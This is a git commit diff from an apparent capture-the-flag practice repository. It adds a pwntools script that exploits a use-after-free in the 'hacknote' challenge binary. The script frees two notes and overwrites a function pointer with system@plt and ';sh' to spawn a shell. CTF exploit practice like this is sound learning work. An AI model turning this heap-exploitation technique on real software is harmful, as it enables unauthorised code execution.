Updated UAF/hacknote

2022-01-27 15:53:37 +08:00
parent 4b6d47ef10
commit 1d1b1ffec2
2 changed files with 50 additions and 1 deletions
--- a/UAF/hacknote/answer.py
+++ b/UAF/hacknote/answer.py
@@ -25,7 +25,6 @@ def note_print(p, index):
    p.recvuntil('Index :')
    p.sendline(str(index))

-# p = remote("hackme.inndy.tw", 7719)
 p = process('./hacknote')
 elf = ELF('./hacknote')
 gdb_command =   """
--- a/UAF/hacknote/shell.py
+++ b/UAF/hacknote/shell.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386", os = "linux", log_level = "debug")
+
+def note_add(p, size, content):
+    p.recvuntil('Your choice :')
+    p.sendline('1')
+    p.recvuntil('Note size :')
+    p.sendline(str(size))
+    p.recvuntil('Content :')
+    p.send(content)
+
+def note_delete(p, index):
+    p.recvuntil('Your choice :')
+    p.sendline('2')
+    p.recvuntil('Index :')
+    p.sendline(str(index))
+
+def note_print(p, index):
+    p.recvuntil('Your choice :')
+    p.sendline('3')
+    p.recvuntil('Index :')
+    p.sendline(str(index))
+
+p = process('./hacknote')
+elf = ELF('./hacknote')
+gdb_command =   """
+                #b *0x80486ca
+                #b *0x8048893
+                #b *0x80488a9
+                #b *0x804875c
+                #b *0x804896C
+                """
+
+system_addr = elf.plt['system'] + 0x6
+# gdb.attach(p, gdb_command)
+
+
+note_add(p, 100, "/bin/sh\x00")
+note_add(p, 100, "/bin/sh\x00")
+note_delete(p, 0)
+note_delete(p, 1)
+note_add(p, 8, p32(system_addr) + ";sh\x00")
+note_print(p, 0)
+
+
+p.interactive()